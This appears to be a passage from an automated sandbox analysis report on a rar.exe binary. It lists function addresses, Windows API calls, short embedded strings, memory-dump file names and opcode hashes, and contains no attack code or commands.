                                                            • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                            • Instruction Fuzzy Hash: 51315E32618B4582E7609F15E55476AB7A0F789BB8F904328EAAC07BC8DF3CD4098F54
                                                            Function 00007FF71D2FB4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentPriorityThread$ClassProcess
                                                            • String ID:
                                                            • API String ID: 1171435874-0
                                                            • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                            • Instruction ID: 8f73cdcadd34d404879ecb24af9fa0af5b8d23f90818bdd89ab98b3fd35e3060
                                                            • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                            • Instruction Fuzzy Hash: 96113331E0CA42C6F664A710D5952BCE261EB54760FA04438C61917685FF2CBC4D8A24
                                                            Function 00007FF71D315630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                            • Instruction ID: 3250902fa097ebd14982b7e2a42884fae8cf0e323dfc7f35271e3029fe757659
                                                            • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                            • Instruction Fuzzy Hash: 9F011730F0DE03C2FA98B7719655139D2A24F48BA0F98553CD91E06BD6FE6DB84D4E60
                                                            Function 00007FF71D2FB850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 502429940-0
                                                            • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                            • Instruction ID: 64072edfa29a39fc01b2e60a0dd9e5487528558753a3c87208263efe03b839ce
                                                            • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                            • Instruction Fuzzy Hash: 5011A032A08E90D6E214AB20E5446A9E331FB89BA0F400231DBAD136A5DF39E46CCB00
                                                            Function 00007FF71D3158A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                            • Instruction ID: 44bb396ce3ad0900293e88e4654be76fd2fced35b886cceb3e34841bb254c550
                                                            • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                            • Instruction Fuzzy Hash: 87912673B0DB8786EB119F299180368EB65AB25BE0F488135CA8D073D5EA3CF119CB11
                                                            Function 00007FF71D2ECFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                            • new.LIBCMT ref: 00007FF71D2ECFD9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: rar$rev
                                                            • API String ID: 3472027048-2145959568
                                                            • Opcode ID: 577253b60d49c6aa0442356c4acb2227b4df70f545d38a99e4159d429305e638
                                                            • Instruction ID: 5416f14a01bd0e0a474e5a48568c41950fabbba13d5ad5eadc99b241de5e716f
                                                            • Opcode Fuzzy Hash: 577253b60d49c6aa0442356c4acb2227b4df70f545d38a99e4159d429305e638
                                                            • Instruction Fuzzy Hash: 92A1B122A0CA5281EB24FB28C4542BDE365FF487A4FD54031DA6D5B6C6FE6CE548CB20
                                                            Function 00007FF71D30F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                            • Instruction ID: 5e61fe99aed2b958024ed534468a4a95276c9c6510a8e65aa93a173959f37844
                                                            • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                            • Instruction Fuzzy Hash: FA714F7390CA12C6E764AF29804517CFBA0FB45F6CFA4113ADA4A42294EF39D489CB65
                                                            Function 00007FF71D315CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                            • Instruction ID: e673519144e54d64d686e1e6c46c4bcfc289408c3800b8d3ff5ef39e902de415
                                                            • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                            • Instruction Fuzzy Hash: A9510C72B1CBC286E7259B359841369FB91E741BA0F4C9239C69C47BD5EF2CE4488B20
                                                            Function 00007FF71D2E4534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF71D2D475B,?,00000000,?,?,00007FF71D2D4620,?,00000000,?), ref: 00007FF71D2E4633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 1611563598-253988292
                                                            • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                            • Instruction ID: 2cebc63cea386cb66dc18830dae62edcb5e4f40d8fb6cfbf92afe845af54cc30
                                                            • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                            • Instruction Fuzzy Hash: FA419311E0CE8280E920BB51E5011FAE351AF497E4FC18631DD7E576D6FE2CE64ECA20
                                                            Function 00007FF71D313B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                            • API String ID: 3307058713-3210298981
                                                            • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                            • Instruction ID: ddd4190e7ac180633b27579221190852f30c5a95d705a27ee8b0ea6c284ff07a
                                                            • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                            • Instruction Fuzzy Hash: F8416D36A0CE53C5EB54BF25A4400B8FBA4EB44BA4B954039E94E47B95FF3DE449CB20
                                                            Function 00007FF71D2F7C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFilewcsstr
                                                            • String ID: System Volume Information\
                                                            • API String ID: 1592324571-4227249723
                                                            • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                            • Instruction ID: 28f3dca1aabeb028de7fe71211a687d9c38cc641647050afececa9b38f1cd896
                                                            • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                            • Instruction Fuzzy Hash: BA312321A1DE8185FF50BB21A1502FAE761AF45BE0FC44430DEAC07796EE3DE04A8B20
                                                            Function 00007FF71D2C4888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$fflushswprintf
                                                            • String ID: %d.%02d$[
                                                            • API String ID: 1946543793-195111373
                                                            • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                            • Instruction ID: dd1c3341f034a5b4687cc6b8ee006cc1511896499905c5ff61d285712a21897d
                                                            • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                            • Instruction Fuzzy Hash: 0D316D21A1DD8291EA60BB10E4153FAE350AF84764FC44539D69D0B6C6FF6CE949CF60
                                                            Function 00007FF71D2F3C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: snprintf
                                                            • String ID: $%s$@%s
                                                            • API String ID: 4288800496-834177443
                                                            • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                            • Instruction ID: 8b64ef0ace3da674ab6fe3d35c1a79d980cd11bbfc86f588e7d3126ef7eabd32
                                                            • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                            • Instruction Fuzzy Hash: F731BF72A0DE8295EA10AB19E4407EAA360FB447A4F800436EE5D17B59FF3DE50DCB20
                                                            Function 00007FF71D2EF474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: fixed%u.$fixed.
                                                            • API String ID: 233258989-2525383582
                                                            • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                            • Instruction ID: 2a6305fcf2607b0ee875e4c4de51381e045a65214c87b52dcfb15d654de1843f
                                                            • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
